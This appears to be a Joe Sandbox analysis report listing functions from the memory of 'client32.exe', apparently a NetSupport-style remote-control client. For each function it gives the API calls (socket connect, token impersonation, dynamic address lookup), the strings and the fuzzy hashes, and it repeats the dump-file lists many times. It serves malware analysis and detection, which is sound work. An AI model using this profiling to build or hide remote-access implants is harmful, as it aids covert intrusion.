                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                                                                    • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                                                                    • API String ID: 559337438-1872371932
                                                                                                                                    • Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                                                                    • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                                                                                    • Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                                                                    • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110D84D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,20F29797,?,?,?,1117EE88,000000FF), ref: 110DEB61
                                                                                                                                    • gethostbyname.WSOCK32(?,20F29797,00000000,?,00000000), ref: 110D8565
                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11187A70,000000FF), ref: 110D8571
                                                                                                                                    • htons.WSOCK32(00000000), ref: 110D85C1
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000000), ref: 110D85D1
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D85DF
                                                                                                                                    • connect.WSOCK32(?,?,00000010,?,00000000,000000FF,?,00000000,000000FF), ref: 110D8613
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D861E
                                                                                                                                      • Part of subcall function 110E08D0: OutputDebugStringA.KERNEL32(?,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,?,00000000,000000FF,20F29797,?,00000000,00000000,?,?,?,00000000,11188D0B), ref: 110E0983
                                                                                                                                      • Part of subcall function 110E08D0: OutputDebugStringA.KERNEL32(1119F2E8,?,?,?,00000000,11188D0B,000000FF,?,110DDF63,?,Invalid Server paramters), ref: 110E098A
                                                                                                                                      • Part of subcall function 111634B1: RaiseException.KERNEL32(?,?,11110E64,?,?,?,?,?,11110E64,?,111CD988), ref: 111634F3
                                                                                                                                    Strings
                                                                                                                                    • Connect() the socket is not closed, xrefs: 110D851D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$DebugOutputString$CriticalEnterExceptionRaiseSectionconnectgethostbynamehtonssocket
                                                                                                                                    • String ID: Connect() the socket is not closed
                                                                                                                                    • API String ID: 2808342085-1125742345
                                                                                                                                    • Opcode ID: 4b8be82f01e1f66e5fa2115c1d67f9f7815bf5f407e5313baca30774dfb5fe9e
                                                                                                                                    • Instruction ID: 21546ceb70cc741e7903571da763b1082d067e34ad2480fef3622f7f36bd6aac
                                                                                                                                    • Opcode Fuzzy Hash: 4b8be82f01e1f66e5fa2115c1d67f9f7815bf5f407e5313baca30774dfb5fe9e
                                                                                                                                    • Instruction Fuzzy Hash: CD418375D00719AFCB14DFA4C840B9EF7B8FF48724F10461AE56AA7684EB70BA04CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110042C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11001F80: FindWindowA.USER32 ref: 11001FA9
                                                                                                                                      • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                                                                      • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                                                                      • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                                                                      • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                                                                      • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                                                                      • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                                                                      • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                                                                                      • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110043C6
                                                                                                                                    • GetSaveFileNameA.COMDLG32(00000058), ref: 110043CF
                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 11004453
                                                                                                                                    • RevertToSelf.ADVAPI32 ref: 11004455
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Process$CloseEnableFileFolderHandleNameOpenPath$FindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion
                                                                                                                                    • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2093866010-2539113696
                                                                                                                                    • Opcode ID: 48da74a7928ca4822a4385de0e35a74d1a49f96b10f86b19444b1993e94a909d
                                                                                                                                    • Instruction ID: 1a06fff4f71d161ae854b0cf7e53d0be396d8369705791c075994b803ddd0564
                                                                                                                                    • Opcode Fuzzy Hash: 48da74a7928ca4822a4385de0e35a74d1a49f96b10f86b19444b1993e94a909d
                                                                                                                                    • Instruction Fuzzy Hash: E441B3B4E003199BEB21DF60CC41FDAB7F4EB08748F0145A9E519AB280DBB5AA44CF54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111A800 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111A938
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111A94E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111A95B
                                                                                                                                    • CreatePalette.GDI32(?), ref: 1111A968
                                                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 1111A97E
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111A996
                                                                                                                                    Strings
                                                                                                                                    • ..\ctl32\Remote.cpp, xrefs: 1111A8D9
                                                                                                                                    • idata->dcafpal_offset < 256, xrefs: 1111A8DE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Palette$Select$CreateDeleteObject
                                                                                                                                    • String ID: ..\ctl32\Remote.cpp$idata->dcafpal_offset < 256
                                                                                                                                    • API String ID: 428128002-1312578601
                                                                                                                                    • Opcode ID: 7bdd334e0e6a0fe434f51e084ab9b01a10f34009200d7bb2d0e31acfea2a01df
                                                                                                                                    • Instruction ID: 0fe01a69d3d0b148662bfc98f1ab0bd740ec6635452722d548052b4e1c8f880b
                                                                                                                                    • Opcode Fuzzy Hash: 7bdd334e0e6a0fe434f51e084ab9b01a10f34009200d7bb2d0e31acfea2a01df
                                                                                                                                    • Instruction Fuzzy Hash: 3A41E1B5600745DBD724CF74D984BA7FBE4AF44304F00852DEA9A9B240D774B846CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11148010 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • Callstack:, xrefs: 111480FF
                                                                                                                                    • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1114809D
                                                                                                                                    • %02X , xrefs: 111480E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$CurrentReadThread
                                                                                                                                    • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                                                                                    • API String ID: 477357799-160799177
                                                                                                                                    • Opcode ID: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                                                                                    • Instruction ID: 6f7d134abcf48abb40f6f3b0b22a813e08fdaf2ee64347ae44ec59e5a96c1c79
                                                                                                                                    • Opcode Fuzzy Hash: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                                                                                    • Instruction Fuzzy Hash: 23410DB1200705AFDB54CFA8DC90F97B7E9BB48608F148918F96DC7644DB30B914CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11028450 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 83synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,762DC740), ref: 11145CA0
                                                                                                                                      • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                      • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                    • wsprintfA.USER32 ref: 110284BA
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
                                                                                                                                    • GetExitCodeProcess.KERNEL32 ref: 11028513
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 11028545
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102854E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseFolderHandlePath$CodeExitFileModuleNameObjectOpenProcessSingleVersionWaitwsprintf
                                                                                                                                    • String ID: %sIsMetro.exe$D$metro=%d
                                                                                                                                    • API String ID: 3779193763-515928727
                                                                                                                                    • Opcode ID: 26f18ffd8f982b8077e350d85f181193653178b5fb6154d62ed9878bd0b9a749
                                                                                                                                    • Instruction ID: 4035e3a62bf36e169ef3c879669cea6ce37e88d9ef90ad3d85adb6442f5f9602
                                                                                                                                    • Opcode Fuzzy Hash: 26f18ffd8f982b8077e350d85f181193653178b5fb6154d62ed9878bd0b9a749
                                                                                                                                    • Instruction Fuzzy Hash: 3D215375A4022CABDB14DBA4CC85FEBB778EF85704F4045D8E518A7644DAB1AE84CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                                                                      • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,762D8BD0,00000000,111F1590,?,110CD955,00000000,762D8BD0), ref: 111103E8
                                                                                                                                      • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,762EA6D0,00000000,?,110CD955,00000000,762D8BD0), ref: 11110408
                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,762D8BD0,00000000,762EA6D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                                                                    • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                                                                    • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                                                                    • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1497311044-0
                                                                                                                                    • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                                                                    • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                                                                                    • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                                                                    • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1094208222-0
                                                                                                                                    • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                                                    • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                                                                    • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                                                    • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
